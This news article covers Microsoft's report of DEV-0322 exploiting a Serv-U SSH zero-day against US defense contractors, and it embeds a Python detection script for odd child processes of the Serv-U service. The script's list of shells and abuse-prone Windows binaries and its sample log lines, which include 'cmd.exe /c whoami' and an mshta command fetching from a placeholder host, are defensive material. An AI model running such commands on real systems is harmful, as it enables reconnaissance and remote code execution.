According to Microsoft’s Threat Intelligence Center (MSTIC), a group Microsoft tracks as “DEV-0322” exploited a zero-day vulnerability in SolarWinds’ Serv-U file transfer (FTP/SFTP) server on Tuesday. The attackers were going after Serv-U installations at the company’s US defense sector customers.
Microsoft 365 Defender first detected the attack automatically, flagging an “anomalous malicious process” on a Serv-U host. Microsoft’s blog post describes that process in more detail; among other suspicious actions, the attackers appear to have been trying to gain Serv-U administrator privileges.
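The “anomalous process” behaviour Microsoft describes points to a simple hunt a defender can run: a file transfer service has little reason to launch other programs, so any child process of Serv-U.exe is worth a look, and a shell or scripting host is worth an alert. The following is an added example written for this page; it is not Microsoft’s detection logic or SolarWinds code. It runs that check over a few constructed process-creation log lines. The key=value log format, the field names, the sample paths and hostnames, and the (empty) allowlist of expected children are all assumptions made for the example and should be tuned to your own telemetry and baseline.

```python
import re
from dataclasses import dataclass
from typing import Iterable, List

# Image name of the Serv-U service process (the real SolarWinds binary name).
SERVU_IMAGE = "serv-u.exe"

# Children the Serv-U service is allowed to start. Assumption for this example:
# none. Build this from your own baseline before deploying the rule.
ALLOWED_CHILDREN: set = set()

# Interpreters and living-off-the-land binaries that merit the highest severity
# when a file transfer service spawns them.
SHELLS = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
    "mshta.exe", "rundll32.exe", "certutil.exe", "whoami.exe", "net.exe",
}

# Constructed sample events in a simple key=value format loosely modelled on
# Windows process-creation logging (Sysmon event 1 / Security 4688). The field
# names, timestamps, hosts and command lines are invented for this example.
SAMPLE_EVENTS = r"""
ts=2021-07-13T02:10:58Z host=FILESRV01 parent=C:\Windows\System32\services.exe image=C:\ProgramData\RhinoSoft\Serv-U\Serv-U.exe cmd="Serv-U.exe"
ts=2021-07-13T02:11:04Z host=FILESRV01 parent=C:\ProgramData\RhinoSoft\Serv-U\Serv-U.exe image=C:\Windows\System32\cmd.exe cmd="cmd.exe /c whoami"
ts=2021-07-13T02:11:09Z host=FILESRV01 parent=C:\Windows\explorer.exe image=C:\ProgramData\RhinoSoft\Serv-U\Serv-U-Admin.exe cmd="Serv-U-Admin.exe"
ts=2021-07-13T02:12:31Z host=FILESRV01 parent=C:\ProgramData\RhinoSoft\Serv-U\Serv-U.exe image=C:\Windows\System32\mshta.exe cmd="mshta.exe http://example.invalid/a"
ts=2021-07-13T02:13:02Z host=FILESRV02 parent=C:\ProgramData\RhinoSoft\Serv-U\Serv-U.exe image=C:\Temp\update.exe cmd="update.exe"
"""


@dataclass
class Finding:
    ts: str
    host: str
    child: str
    cmdline: str
    severity: str


# key=value pairs; a value is either "quoted, may contain spaces" or a bare token.
_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> dict:
    """Parse one key=value log line into a dict of field -> value."""
    return {key: (quoted or bare) for key, quoted, bare in _KV.findall(line)}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(lines: Iterable[str]) -> List[Finding]:
    """Return a Finding for every process whose parent is Serv-U.exe and that is
    not on the allowlist; shells and LOLBins are rated 'high', anything else 'medium'."""
    findings: List[Finding] = []
    for raw in lines:
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        ev = parse_event(line)
        parent = basename(ev.get("parent", ""))
        child = basename(ev.get("image", ""))
        if parent != SERVU_IMAGE or child in ALLOWED_CHILDREN:
            continue
        severity = "high" if child in SHELLS else "medium"
        findings.append(Finding(ev.get("ts", "?"), ev.get("host", "?"),
                                child, ev.get("cmd", ""), severity))
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS.splitlines()):
        print(f"{f.severity.upper():6} {f.ts} {f.host}: Serv-U.exe -> {f.child}  [{f.cmdline}]")
```

On the sample above the rule ignores the service being started by services.exe and the admin console started by a user, and reports the three processes launched by the service itself, rating the shell and the mshta invocation high and the unknown binary medium. In production the same logic would read Sysmon or Security 4688 events rather than constructed lines, and the allowlist would hold whatever child processes your own Serv-U hosts legitimately spawn.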
Microsoft attributes the Serv-U zero-day attack to a group operating out of China
SolarWinds said in an advisory published on July 9th that the Serv-U build released on May 5th and all earlier versions contain the vulnerability. According to Microsoft, the flaw lies in Serv-U’s implementation of the Secure Shell protocol (SSH), so an installation is exposed only if its SSH service is enabled and reachable from the internet. SolarWinds has released a hotfix that addresses the issue.
We strongly recommend that anyone running an older Serv-U version apply the hotfix immediately: a successful exploit lets an attacker install and run arbitrary code on the server, and view, change or delete data on it.
SolarWinds first made headlines in December 2020, when a supply-chain compromise of its software exposed hundreds of businesses and government agencies. Microsoft assesses that DEV-0322 operates out of China, unlike that earlier intrusion, which was attributed to the Russian state-affiliated group Cozy Bear.
Microsoft writes that DEV-0322 specializes in attacking “US Defense Industrial Base Sector entities,” and that it uses compromised consumer routers and commercial VPN solutions as part of its attack infrastructure.